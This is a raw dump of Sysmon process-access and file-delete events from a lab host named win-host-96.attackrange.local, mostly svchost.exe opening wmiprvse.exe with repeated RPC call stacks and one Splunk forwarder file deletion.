12:24:45.273{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292589Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.273{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292588Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.273{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292587Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.273{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292586Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.273{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292585Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.273{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292584Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292583Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292582Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292581Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292580Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292579Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292578Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292577Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292576Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292575Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292574Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292573Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292572Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292571Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292570Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292569Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292568Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292567Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87888C833D94ECADE2840BAD6F8B94B1,SHA256=4F2DAFD5B2EF03437EA04158ABEEDFCD834070C575DE1CE9C04B024427ABBE50,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292566Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292565Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 